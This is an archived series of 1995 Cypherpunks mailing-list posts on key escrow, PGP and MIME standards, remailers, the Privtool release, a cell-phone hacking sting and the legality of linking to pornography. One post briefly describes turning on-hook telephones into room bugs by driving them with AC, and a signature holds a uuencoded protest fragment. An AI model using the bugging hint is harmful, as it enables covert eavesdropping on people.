>a government tap switch, subject to warrant, of course?

While not every telephone, every telephone switch is required to be tap capable - The Digital Telephony Act. Note there is provision for the government to pay costs for Telcos to make their phones tappable - as yet unfunded by Congress.

The rights of The People have clearly collided with the interests of Law Enforcement.
Guess who Congress likes better?

From martin at mrrl.lut.ac.uk Thu Sep 14 12:44:21 1995
From: martin at mrrl.lut.ac.uk (Martin Hamilton)
Date: Thu, 14 Sep 95 12:44:21 PDT
Subject: MOSS [IETF privacy-enhanced mail, modified for MIME] now available
In-Reply-To: <9509132335.AA05053@sulphur.osf.org>
Message-ID: <199509141944.UAA22502@gizmo.lut.ac.uk>

Rich Salz writes:

| >From pem-dev-request at neptune.tis.com Wed Sep 13 19:27:35 1995
| Message-Id: <9509132011.AA19261 at tis.com>
| Reply-To: James M Galvin
| To: "MOSS.Announce.List":;, tis.com at TIS.COM
| Subject: ANNOUNCE: TIS/MOSS Version 7.1

[...]

| 3
| Q: How does MOSS compare to PGP and PEM?
|
| PGP can provide the same services but since it is not integrated with
| MIME the interpretation of the protected content is necessarily user
| controlled. Note, however, that MIME can carry a PGP object.

Just wondering - is anyone working on a profile for PGP under MOSS and/or the multipart/signed and multipart/encrypted body parts ? Whether or not they are, it would be useful to have a de-facto standard for the use of PGP with current MIME implementations. I recall there was a draft RFC by Nathaniel Borenstein which dealt with this, but it was withdrawn to leave the way clear for MOSS ?

Why bother ? Well, there are lots of mailers out there with "some" MIME support - enough for launching a helper application to read and perhaps compose (say) application/pgp, but not nearly enough to handle MOSS. I'm thinking about commercial offerings for the likes of MacOS, DOS, and Windows in particular. It seems like a really neat hack to use the MIME support to bring PGP in by stealth, but perhaps most of the implementations Out There are too crippled ?

Over to you...
:-)

Martin

From gnu at toad.com Thu Sep 14 13:18:14 1995
From: gnu at toad.com (John Gilmore)
Date: Thu, 14 Sep 95 13:18:14 PDT
Subject: Corrections to "Ron Plesser's take on NIST GAK"
Message-ID: <9509142018.AA04536@toad.com>

There were a few sentences truncated in what I posted yesterday, due to mistakes on my part. Here are the corrections.

John

... The Administration policy for 40-bit-key encryption will continue as-is, and no keys will have to be escrowed for such systems. Mr. Nelson said that the government's main concern is that strong encryption products not be available in the mass market.

... bi-lateral agreements with friendly nations.

In a presentation, Bob Holleyman of the Business Software Alliance criticized the Administration's failure to "liberalize export controls on generally available software employing non-key escrow encryption." Also, he stated that the Administration's proposal and the draft criteria "continue to reflect a misunderstanding of the market place and, if implemented in anything like their current form, will prevent key escrow encryption from ever being commercially adopted." Mr. Holleyman recommended a number of features for a marketable system, including a variety of encryption algorithms using at least 64-bit keys and user specification of a key holder.

From unicorn at polaris.mindport.net Thu Sep 14 13:58:33 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Thu, 14 Sep 95 13:58:33 PDT
Subject: cryptography eliminates lawyers?
In-Reply-To:
Message-ID:

On Thu, 14 Sep 1995, Dar Scott wrote:

> Black Unicorn wrote,

[...]

> >> Perhaps, I could have used the phrases "non-coercion-based" licensing and
> >> "coercion-based" licensing, but I am not comfortable with these--trade
> >> licensing invokes too violent of an image.
> >
> >I think this construction is still flawed. I will remain by my position
> >that licensing is useful when not used to collect taxes or
> >otherwise overregulate.
> >I also hold that the distinctions you make
> >between licensing and certification are without functional difference in
> >effect and are deceptive in that they suggest a significant difference in
> >effect or purpose where there is none.
> >
> The difference in effect is in emergent market optimization. The
> difference in purpose is ethical.
>
> I have learned that you--and perhaps others--do not see an important
> difference in these two styles of influencing behavior. I see a major
> difference and in thinking the difference was obvious was slow in
> understanding your position. I think I understand your position now.

To me there is little difference in how one is persuaded against one's will. Certainly I dislike violence, but some of the "persuasive" methods in a market economy sicken me just as much as force might.

In any event, your construction makes sense to me, even if I do not find it useful myself.

> Great. You're already enjoying breakfast and I still have to go to bed.

I hate time zones.

> Dar
>
> ===========================================================
> Dar Scott                        Home phone: +1 505 299 9497
>
> Dar Scott Consulting             Voice:      +1 505 299 5790
> 8637 Horacio Place NE            Email:      darscott at aol.com
> Albuquerque, NM 87111                        dsc at swcp.com
>                                  Fax:        +1 505 898 6525
> http://www.swcp.com/~correspo/DSC/DarScott.html
> ===========================================================
>
>
>

From futplex at pseudonym.com Thu Sep 14 14:01:27 1995
From: futplex at pseudonym.com (Futplex)
Date: Thu, 14 Sep 95 14:01:27 PDT
Subject: Crimestoppers anon tip mailbox
In-Reply-To: <199509141913.MAA08819@infinity.c2.org>
Message-ID: <199509142101.RAA23535@ducie.cs.umass.edu>

Mark writes:
# Someone already tried that. The cops got a copy of the WWW logs and
# started investigating everyone who'd looked at the WWW page...

sameer writes:
[re: the kidnapped-child info Web page]
> How did they get the logs? Did they have a court order?

No.
The owner of the Web page voluntarily offered the logs when asked by the local police.

-Futplex

From joseph at genome.wi.mit.edu Thu Sep 14 14:55:32 1995
From: joseph at genome.wi.mit.edu (Joseph Sokol-Margolis)
Date: Thu, 14 Sep 95 14:55:32 PDT
Subject: Linking = Showing = Transferring?
Message-ID:

>>And Duncan's specific point remains:
>>
>>-- is it a violation of pornography laws (perhaps campus rules) to have a
>>home page with links to URLs containing pornographic images?
>>
>>-- is it a violation of _child pornography_ laws to have a home page with
>>links to URLs containing child pornography images? (The URLs could be
>>offshore, perhaps in jurisdictions where the age of consent is much
>>different than in the U.S., e.g., Denmark or Thailand.)
>>
>>-- is it a violation of national security laws to have a home page with
>>links to URLs containing national defense secrets? (The URLs could be
>>offshore.)
>>
>>-- is it a violation of copyright/patent laws to have home pages with
>>pointers to protected material? (Songs, written works, images, inventions,
>>etc.)
>>
>>And so on....

Here's my question, and a thought to ponder: If it is/becomes illegal to have links on a homepage to pornography because it is ruled as the same as having the pornography there; then can you have links to pages with links (the same as having it) to pornography? This repeats, so would it be legal to link at all?

--------------------------------------------------------------------------------
Joseph Sokol-Margolis                               joseph at genome.wi.mit.edu
Assistant Systems Administrator                     seph at mit.edu
Whitehead Institute/MIT Center for Genome Research  phone: (617) 252-1922
One Kendall Sq. Bldg. 300                           fax:   (617) 252-1902
Cambridge, MA 02139-1561
----------------------http://www-genome.wi.mit.edu/~joseph/---------------------

From loki at obscura.com Thu Sep 14 14:58:20 1995
From: loki at obscura.com (Lance Cottrell)
Date: Thu, 14 Sep 95 14:58:20 PDT
Subject: Mixmaster status changing
Message-ID: <199509142157.OAA10304@obscura.com>

-----BEGIN PGP SIGNED MESSAGE-----

I recently promised to release the next version of Mixmaster (V 2.0.2) within 48 hours. The situation has changed. The release of the next version of Mixmaster will be indefinitely delayed.

There has been an offer to purchase and commercially develop Mixmaster. This will hasten the development of Mixmaster for other platforms (e.g. DOS, Windows, Macintosh), and bring significant improvements to the interface, but I will not compromise on the level of security provided by Mixmaster. Free client software will continue to be available.

This could be the big breakthrough for remailers, finally thrusting them out of the hobbyist's closet into the corporate world. We have all known that remailers would not become widely used by the rest of the world until they were easy to use. Many corporations also fear freeware because of its unknown provenance and its lack of support.

I apologize for the delay, but I think that the wait will be worth it.

-Lance M. Cottrell

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

--
Lance Cottrell   loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche

From mark at unicorn.com Thu Sep 14 15:00:55 1995
From: mark at unicorn.com (Rev. Mark Grant)
Date: Thu, 14 Sep 95 15:00:55 PDT
Subject: Privtool 0.85 Released
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Hi,

I've just released a new version of Privtool, with a large number of bugfixes and new features. It's available from ftp.c2.org as /pub/privtool/privtool-0.85.tar.gz, and in Europe from ftp.dsi.unimi.it in /pub/security/crypt/code, or from ftp.ox.ac.uk in /pub/crypt/pgp/utils.

DUE TO US ITAR REGULATIONS, IF YOU ARE OUTSIDE THE US YOU SHOULD DOWNLOAD PRIVTOOL FROM A NON-US SITE. Dumb, but true...

Documentation is also available on the WWW at http://www.c2.org/~mark/privtool/privtool.html.

Mark

Privtool Beta Release @(#)README.1ST 1.34 9/12/95
-----------------------------------------------------

Privtool ("Privacy Tool") is intended to be a PGP-aware replacement for the standard Sun Workstation mailtool program, with a similar user interface and automagick support for PGP-signing and PGP-encryption. Just to make things clear, I have written this program from scratch, it is *not* a modified mailtool (and I'd hope that the Sun program code is much cleaner than mine 8-) !).

When the program starts up, it displays a list of messages in your mailbox, along with flags to indicate whether messages are signed or encrypted, and if they have had their signatures verified or have been decrypted. When you double click on a message, it will be decrypted (requesting your passphrase if necessary), and/or will have the signature checked, and the decrypted message will be displayed in the top part of the display window, with signature information in the bottom part. The mail header is not displayed, but can be read by pressing the 'Header' button to display the header window.
In addition, the program has support for encrypted mailing list feeds, and if the decrypted message includes another standard-format message it will replace the original message and be fed back into the display processing chain.

When composing a message or replying to one, the compose window has several check-boxes, including one for signature, and one for encryption. If these are selected, then the message will be automatically encrypted and/or signed (requesting your passphrase when necessary) before it is sent. You may also select a 'Remail' box, which will use the Mixmaster anonymous remailer client program to send the message through one or more remailers.

Being a Beta release, there are a number of bugs and nonfeatures :

Known Bugs :

When you save changes to the mail file, it throws away the signature verification and decrypted messages, so that the next time you view a message it has to be verified or decrypted again.

Privtool requires that the /usr/spool/mail directory is world-writable. Some versions of Linux are set up to have mail programs setgid mail, and have write access only to mail and root, causing hangs when saving changes. This will be fixed in the next release.

Header window is not updated if left open.

Date parsing on Linux is not quite correct.

Problem with compose window layout if using Bcc: or extra header lines.

Crashes if you tab from the Cc: field to the message body.

Known Nonfeatures :

Currently if you send encrypted mail to multiple recipients, all must have valid encryption keys otherwise you will have to send the message decrypted. Also, the message will be sent encrypted to all users, not just the one who is receiving each copy.

Only one display window.

Code should be more modular to assist with ports to Xt, Motif, Mac, Windows, etc.

Not very well documented !

Encrypted messages are saved to mail files in encrypted form. There is currently no option to save messages in decrypted form.

No support for anonymous return addresses.
Not very well tested on Solaris 2.x, or Linux.

Changes for 0.85:

Support for Reply-To: addresses in message headers.

If you have PGP Tools, then the passphrase is now stored in MD5 form rather than as ASCII text. This will make it harder to steal your passphrase if you're running on a multi-user machine (which you shouldn't be, but many of us are).

Improved documentation.

'New mail' indicator in icon now goes away if you open the window and close it again without reading any messages.

Support for multiple compose windows - no more pressing 'Reply' and screaming because you deleted the message you were editing !

Query on exit if any compose windows are open.

Show busy cursor for time-consuming operations.

Kill-by-name and Kill-by-subject now work correctly.

'Add Key' button now works.

Optionally beep on bad signature.

Added various changes from Anders Baekgaard (baekgrd at ibm.net), we can now use a more normal icon if preferred, pass arguments on the command line, specify the font to use, support the 'showto' option, allow X-resources to be set up, fix a bug in Linux which showed the message list as a black box, cleaned up some warnings from x.c, support bcc:, and have an option for a simplified, smaller, display layout for machines with small screens.

Fixed some memory leaks in deliver_proc ().

Anders finally got the scrollbar to go to the right place when opening mail files ! Yay !!!!

Fixed bad arguments that were being passed to bzero() in pgplib.c and potentially causing random memory overwrites.

Fix for Linux icon corruption from A J Teeder (ajteeder at dra.hmg.gb).

Added 'resend' to resend a message that failed the first time.

Added Linux-specific Makefile, now that I have my own Linux box to test it on.

Fixed SEGV when delivering messages (with some .mailrc files), caused by a bug in the alias-handling code.

Privtool can be compiled to either use PGP Tools, or to fork off a copy of PGP whenever it is needed.
There are also a number of different security level options for the passphrase, varying from 'read it from PGPPASS and keep it in memory' to 'request it every time and delete it as soon as possible', via 'request it when necessary and delete it if it's not used for a while'.

Unfortunately, PGP Tools (or at least the version that I have) does not appear to work correctly on Linux.

See the README file for information on compiling the code, and the user.doc file for user documentation (the little that currently exists). You should also ensure that you read the security concerns section in user.doc before using the program.

Mark Grant (mark at unicorn.com)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

-----END PGP SIGNATURE-----

From patrick at Verity.COM Thu Sep 14 15:08:17 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Thu, 14 Sep 95 15:08:17 PDT
Subject: [NOISE] Alice's Remailer site
Message-ID: <9509142204.AA22141@cantina.verity.com>

>
> And can you imagine FIFTY people a day? I said FIFTY people a day --
> loggin' in, sending mail through Alice's Remailer site and loggin' out?
> And friends, they may think it's a MOVEMENT, and that's what it is:
>
> THE ALICE'S REMAILER SITE ANTI-E-MAIL-SNIFFING MOVEMENT!--
>
> and all you gotta do to join is to flip the bird to those traffic-sniffin'
> spooks out there -- With feelin' ...
>
>
> -Tom Swiss / tms at tis.com
>

There sure are a lot of us old fogies around here:)

Patrick

 _______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;).   \
|       (\                                                               |
| Patrick J. Horgan         Verity Inc.                  \\    Have      |
| patrick at verity.com      1550 Plymouth Street          \\ _  Sword     |
| Phone : (415)960-7600     Mountain View                \\/   Will      |
| FAX   : (415)960-7750     California 94303            _/\\   Travel    |
\___________________________________________________________\)__________/

From alano at teleport.com Thu Sep 14 15:15:16 1995
From: alano at teleport.com (Alan Olsen)
Date: Thu, 14 Sep 95 15:15:16 PDT
Subject: AOL Porno
Message-ID: <199509142214.PAA07197@desiree.teleport.com>

At 05:25 AM 9/14/95 -0400, you wrote:
>Will the federal prosecutors and Fibbies on this list please
>emphasize that the Internet was not involved in the AOL kiddie porn
>case. The Internet has enough opportunities for bad publicity as
>it is.

I watched the local news coverage of that case. The report was given by an individual who has made that mistake before. (He hosts a "Town Hall" program that exploits various subjects of the day. He was corrected as to "AOL not being the Internet" during one of them. I know, I was the one who corrected him.)

The coverage showed lots of shots of the various internet binaries echos (including alt.binaries.pictures.erotica.children, but not alt.binaries.pictures.cops.), the web including the Penthouse site (as if Penthouse has kiddy porn), and other unrelated and non-AOL pictures.

The Internet has become the new scapegoat of choice. The general media cannot (or is unwilling to) distinguish the difference between electronic nets. The Internet is a generic term for them and since when is the media willing to look beyond the surface?

How does this connect to crypto? Well, aiding and abetting in a scapegoat is a capital crime in this country. You can be assured that the Department of Scapegoat Management will link kiddy porn and crypto at some point in the minds of the generic public. Hopefully that perception can be "headed off at the pass". Having cryptography as a means of avoiding crime and criminals in the perception of the public is a good idea.
The question is how to get that perception into the minds of the general public before the other meme can be implanted by Scapegoat Management and the other TLAs?

>"Who wonders: How it is that CompuServe was able to exist from 1979
>to the arrival of Prodigy and AOL without major sex, and drugs, and
>rock and roll problems?"

I think the six-dot-three filenames have something to do with it...

|         Visualize whirled keys                  |  alano at teleport.com   |
|"It's only half a keyserver.  I had to split the |    Disclaimer:        |
|other half with the government man." - Black Art |  Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard. |
|      http://www.teleport.com/~alano             |                       |

From liberty at gate.net Thu Sep 14 15:57:37 1995
From: liberty at gate.net (Jim Ray)
Date: Thu, 14 Sep 95 15:57:37 PDT
Subject: cryptography eliminates lawyers?
Message-ID: <199509142253.SAA63671@tequesta.gate.net>

-----BEGIN PGP SIGNED MESSAGE-----

Brian Davis wrote:

>Just wondering about liability issues after state accrediting is dead.

Despite loud squawking, "chaos" will not ensue. Instead, the private sector will take over assessing risk, which it has always done better. An example: I'd rather jump into a full bathtub with a plugged-in, UL [Underwriter's Laboratories] certified TV set than take the FDA approved (but very dangerous, IMO) prostate drug called "Proscar." While there is only one UL (by choice, not force) and only one FDA (by force, not choice) I can easily imagine lawyer-certifying companies like UL for appliances, probably tied [like UL] to the insurance industry. [I am not a lawyer, or a doctor either.]
JMR

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

-----END PGP SIGNATURE-----

Regards, Jim Ray

"When making public-policy decisions for the government, I think one should ask oneself which technologies would best strengthen the hand of a police state. Then, do not allow the government to deploy those technologies." -- Phillip Zimmermann, talking to himself. (Congress sure-as-hell wasn't paying attention!)
-----------------------------------------------------------------------
PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8
Key id. # E9BD6D35                                        James M. Ray
-----------------------------------------------------------------------
Help Phil! email zldf at clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________

From rsalz at osf.org Thu Sep 14 16:26:27 1995
From: rsalz at osf.org (Rich Salz)
Date: Thu, 14 Sep 95 16:26:27 PDT
Subject: NSA on GAK
Message-ID: <9509142325.AA06863@sulphur.osf.org>

>> Internet runs on software distributed over the Internet.

This is more like an aphorism than a true statement.

From fstuart at vetmed.auburn.edu Thu Sep 14 16:39:21 1995
From: fstuart at vetmed.auburn.edu (Frank Stuart)
Date: Thu, 14 Sep 95 16:39:21 PDT
Subject: Linking = Showing = Transferring?
Message-ID: <199509142338.SAA10960@snoopy.vetmed.auburn.edu>

[...]
>Here's my question, and a thought to ponder: If it is/becomes illegal to
>have links on a homepage to pornography because it is ruled as the same as
>having the pornography there; then can you have links to pages with links
>(the same as having it) to pornography? This repeats, so would it be legal
>to link at all?
[...]

And then there's the problem of URLs not being static.
What may be a perfectly innocuous link one day may turn into something not perceived as harmless the next. I seem to recall reading about a French site (Femmes Femmes Femmes) that offered pictures of nude females. When the traffic got too much for them, they jokingly changed the links to point to pictures at the Louvre. However, it could just as easily happen the other way.

I also heard something about the ACM taking the position that a URL was not equivalent to the work itself, but I don't have a reference.

Frank Stuart                  | (Admiral Grace) Hopper's Law:
fstuart at vetmed.auburn.edu     | It's easier to get forgiveness than permission.

From dsmith at midwest.net Thu Sep 14 17:00:16 1995
From: dsmith at midwest.net (David E. Smith)
Date: Thu, 14 Sep 95 17:00:16 PDT
Subject:
Message-ID: <199509150009.TAA09893@cdale1.midwest.net>

-- [ From: David E. Smith * EMC.Ver #2.5.02 ] --

> /* SAFER SK-128 designed by James L. Massey who did not do this
> conversion and is not responsible for any bugs in it.
>
> This a 'C' conversion of the reference Turbo Pascal implementation

Does anyone out there have a pointer to the "Turbo Pascal implementation?" (Or the code itself?)

Reply to me, not the list; there's quite enough spam as it is.

--
David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO 63701-4745
(314)339-3814, dsmith at midwest.net, PGP ID 0x92732139
Opinions are mine (though I often claim demonic possession)
http://www.midwest.net/scribers/dsmith/index.html

From shamrock at netcom.com Thu Sep 14 17:09:16 1995
From: shamrock at netcom.com (Lucky Green)
Date: Thu, 14 Sep 95 17:09:16 PDT
Subject: DD, pedaphiles, and Terrorists, oh my
Message-ID: <199509150006.UAA17827@book.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article <9509141640.AA30602 at zorch.w3.org>, hallam at w3.org wrote:

>We never used to see kiddie porn on the internet. The net would go ballistic if a
>picture of a teen age nude was posted.
>Recently there has been a flood of hard
>core paedophile material.

There have always been nude teens on the net. The kind of pictures the most casual observer can take at any Mediterranean beach on any given day in the Summer. There is no real kiddy porn readily available on the net. I looked long and hard. It's a red herring.

ANYBODY on this list seen some real kiddy porn on the net? I am talking intercourse, etc., not scans of six year olds from the Sears catalog, or naked boys building sandcastles on the beach.

--
-- Lucky Green PGP encrypted mail preferred.

---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From dsc at swcp.com Thu Sep 14 17:09:33 1995
From: dsc at swcp.com (Dar Scott)
Date: Thu, 14 Sep 95 17:09:33 PDT
Subject: Linking = Showing = Transferring?
Message-ID:

Suppose we interpret Linking = Showing as

For all web pages x and y,
Showing(x) and Linkto(x,y) --> Showing(y)

Meaning: In all cases, if a page is being shown and it links to another page, then the other page is being shown.

With this kind of transitivity I would not be surprised if a third of the web sites are showing pornography. For example (made up titles!),

Transitors --> Electronics Distributers --> Ray's TV --> Springfield Businesses --> Bob's Photography --> Plenty Pictures --> Photography Resources --> Asian, Female --> World Nudity --> John's Porno Shop.

The poor guy trying to be helpful to those learning electronics now has a pornopage.

Perhaps some kind of fuzzy logic could apply. If one believes in such a thing.

I wonder if I have a pornopage.
Dar
===========================================================
Dar Scott                   Home phone: +1 505 299 9497
Dar Scott Consulting        Voice: +1 505 299 5790
8637 Horacio Place NE       Email: darscott at aol.com
Albuquerque, NM 87111       dsc at swcp.com
                            Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================

From shamrock at netcom.com Thu Sep 14 17:13:32 1995
From: shamrock at netcom.com (Lucky Green)
Date: Thu, 14 Sep 95 17:13:32 PDT
Subject: Child Porn, Morphing, and Pointers
Message-ID: <199509150010.UAA17856@book.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article , tcmay at got.net (Timothy C. May) wrote:
>>If I'm reading this correctly, if I Photoshop a kids face onto the body
>>of the latest Playboy centerfold, I'm in violation of this proposed law?
>
>I believe there have already been prosecutions along these lines. For
>example, do you think a _comic book_ with child porn themes ("explicit"
>art, situations) would not be prosecuted as child porn?
>
>I strongly suspect that a _painting_ of a 7-year-old girl engaged in a sex
>act would result in a prosecution.

Any cites?

--
-- Lucky Green PGP encrypted mail preferred.

---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From carolann at censored.org Thu Sep 14 17:28:55 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Thu, 14 Sep 95 17:28:55 PDT
Subject: Digital Fingerprinting
Message-ID: <199509140335.UAA13203@usr3.primenet.com>

>> Why do I feel like I'm sitting on the group W bench?
>
>I don't know, kid, what you in for? MacN

I said, "Velveeta," and they all moved away.
"And, using a PGP signed message, through a chained MIXMASTER remailer to help Phil Z.," and they all came back, and we was talking about packet-sniffing, reputation markets, key cracking, ITAR, IP spoofing, Diffee-Hellman session keys, RC4, MD5, and all those wonderful things right there on the group W bench... -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From jya at pipeline.com Thu Sep 14 17:47:42 1995 From: jya at pipeline.com (John Young) Date: Thu, 14 Sep 95 17:47:42 PDT Subject: Celco Sting Message-ID: <199509150047.UAA05488@pipe4.nyc.pipeline.com> There's more on the cell-phone sting reported in the NYT Tuesday at: URL: gopher://justice2.usdoj.gov/00/usao/new_jersey/nj62.txt [Snippet] Secret Service "Operation Cybersnare" Arrested late Friday were: "Chillin," "Led," "Alpha Bits," "Mmind," "Cellfone" and "Barcode." A computer "hacker" is an individual with expertise in gaining unauthorized entry into computer systems. From shamrock at netcom.com Thu Sep 14 17:50:12 1995 From: shamrock at netcom.com (Lucky Green) Date: Thu, 14 Sep 95 17:50:12 PDT Subject: Linking = Showing = Transferring? Message-ID: <199509150047.UAA18025@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , joseph at genome.wi.mit.edu (Joseph Sokol-Margolis) wrote: >Here's my question, and a thought to ponder: If it is/becomes illegal to >have links on a homepage to pornography because it is ruled as the same as >having the pornography there; then can you have links to pages with links >(the same as having it) to pornography? 
>This repeats, so would it be legal
>to links at all?

The answer is trivial. If it pisses off the fascists in power enough, you go to jail or get killed.

--
-- Lucky Green PGP encrypted mail preferred.

---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From shamrock at netcom.com Thu Sep 14 17:57:32 1995
From: shamrock at netcom.com (Lucky Green)
Date: Thu, 14 Sep 95 17:57:32 PDT
Subject: GAK
Message-ID: <199509150055.UAA18048@book.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article <9509141935.AA09315 at argosy.MasPar.COM>, koontz at MasPar.COM (David G. Koontz) wrote:
>While not every telephone, every telephone switch is required
>to be tap capable - The Digital Telephony Act. Note there is
>provision for the government to pay costs for Telcos to make
>their phones tappable - as yet unfunded by Congress.

Most telephones can be used to monitor conversations in the room they are installed in even while on-hook. No need to ever enter the premises. Just drive it with AC. Look at your basic telephone diagram and remember Xc=1/(omega*C) from your AC circuits class.

--
-- Lucky Green PGP encrypted mail preferred.

---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
From dsc at swcp.com Thu Sep 14 17:58:50 1995
From: dsc at swcp.com (Dar Scott)
Date: Thu, 14 Sep 95 17:58:50 PDT
Subject: Linking = Showing = Transferring?
Message-ID:

Whoops! I mentioned the "linking to a page that links to a page..." problem without noticing that Joseph Sokol-Margolis had already brought it up.

Maybe pornography is not in the page (or resource) but in the browser. For example, I have a "pornography enabled" browser, because I can use it to access pornopages. What if I set up a browser for my child that saw a smaller view of the net that did not include pornopages. That browser would not be "pornography enabled".

The limited view could be created from some combination of lists of OK sites & pages, lists of off-limits sites & pages, and certification requirements for those in between (virtual OK lists). I have seen the off-limits lists in association with some blocking products.

Frank Stuart wrote,
>And then there's the problem of URLs not being static. What may be a perfectly
>innocuous link one day may turn into something not perceived as harmless the
>next.

The blocking (off-limits) lists are then always behind and flawed. Better OK lists might be created by the list publisher having contractual commitments from the site owner.

A virtual OK list publisher would publish the key for verifying approved pages that have built-in certs. This would provide the better probability that the browser was not pornography enabled. A page would not show if it had been changed. A problem to be solved would be doing this with minimal psychological time costs to the user. Another is making sure that getting certs would not be such a pain that only a few sites would be on the virtual OK list.
Of course, I would not want my kids under 10 to see certain ideological pages and there might not be a market to justify certs. I would have to make my own list or get a cheap blocking list or something from the major-group-with-same-ideological-bent-as-dar ftp site.

Dar
===========================================================
Dar Scott                   Home phone: +1 505 299 9497
Dar Scott Consulting        Voice: +1 505 299 5790
8637 Horacio Place NE       Email: darscott at aol.com
Albuquerque, NM 87111       dsc at swcp.com
                            Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================

From m5 at dev.tivoli.com Thu Sep 14 18:05:25 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Thu, 14 Sep 95 18:05:25 PDT
Subject: GAK
In-Reply-To: <199509150055.UAA18048@book.hks.net>
Message-ID: <9509150104.AA03601@alpha>

Lucky Green writes:
> Most telephones can be used to monitor conversations in the room they are
> installed in even while on-hook. No need to ever enter the premises. Just
> drive it with AC. Look at your basic telephone diagram and remember
> Xc=1/(omega*C) from your AC circuits class.

The phrase "most telephones" may have been accurate when it meant "500 sets", but now that people generally own electronic phones I wonder whether the lucky one's statement remains true. (It might; I'm an electronics ignoramus.)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX     |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From barrett at iafrica.com Thu Sep 14 19:00:27 1995
From: barrett at iafrica.com (Alan Barrett)
Date: Thu, 14 Sep 95 19:00:27 PDT
Subject: [NOISE] Re: Linking = Showing = Transferring?
In-Reply-To:
Message-ID:

> I wonder if I have a pornopage.
Of course you do (assuming the stupid transitive definition of a pornopage).

Start at your home page
  http://www.swcp.com/~correspo/DSC/DarScott.html
--> follow link to "National Instruments" in second paragraph
  http://www.natinst.com/
--> follow link to "Reference" a few lines from the bottom of the page
  http://www.natinst.com/links.htm
--> "WWW Virtual Library" near the top of the page
  http://epims1.gsfc.nasa.gov/engineering/ee.html
--> "WWW Virtual Library" right at the top of page
  http://www.w3.org/hypertext/DataSources/bySubject/Overview.html
--> "Other virtual libraries" near the bottom of the (rather long) page
  http://www.w3.org/hypertext/DataSources/bySubject/Virtual_libraries/Overview.html
--> "Yahoo - A Guide to WWW"
  http://www.yahoo.com/
--> "Entertainment"
  http://www.yahoo.com/text/Entertainment/
--> "Magazines"
  http://www.yahoo.com/text/Entertainment/Magazines/
--> "Sex"
  http://www.yahoo.com/text/Entertainment/Magazines/Sex/
--> you figure out the rest

From rsalz at osf.org Thu Sep 14 19:02:46 1995
From: rsalz at osf.org (Rich Salz)
Date: Thu, 14 Sep 95 19:02:46 PDT
Subject: Celco Sting
Message-ID: <9509150202.AA07087@sulphur.osf.org>

> A computer "hacker" is an individual with expertise in gaining
> unauthorized entry into computer systems.

I heard the special agent in charge being interviewed on NPR this morning. He was very careful to distinguish between "classic hackers" who just poke around for their own edification, and those who are using networks to actively commit crimes. My paraphrase, but it was definitely a praiseworthy viewpoint.

/r$

From rsalz at osf.org Thu Sep 14 19:07:17 1995
From: rsalz at osf.org (Rich Salz)
Date: Thu, 14 Sep 95 19:07:17 PDT
Subject: Linking = Showing = Transferring?
Message-ID: <9509150206.AA07108@sulphur.osf.org>

>Suppose we interpret Linking = Showing as
>
>For all web pages x and y,
>Showing(x) and Linkto(x,y) --> Showing(y)

Then we would be fools.
No more so than buying a book means you have instant access to all resources mentioned as footnotes or in the bibliography.

Put more simply, *you have to click on Y* so they're not the same.

/r$

From tcmay at got.net Thu Sep 14 19:28:55 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 14 Sep 95 19:28:55 PDT
Subject: Explaining Zero Knowledge to your children
Message-ID:

At 6:18 PM 9/14/95, Hadmut Danisch wrote:
>There is a paper about explaining Zero Knowledge methods in simple
>words. It's titled "Explaining Zero Knowledge Authentication to your
>children" or something similar. It's said to be in the proceedings of
>any conference. Does anybody know where to find it?

Schneier describes the "cave" analogy in his book, on p. 85, and gives a reference:

Quisquater, Guillou, Berson, "How to Explain Zero-Knowledge Protocols to your Children," Advances in Cryptology--CRYPTO '89 Proceedings.

The paper is only a couple of pages long and would make a nice scan project for someone, as it has no equations. But Schneier is the easiest way to read up on it.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
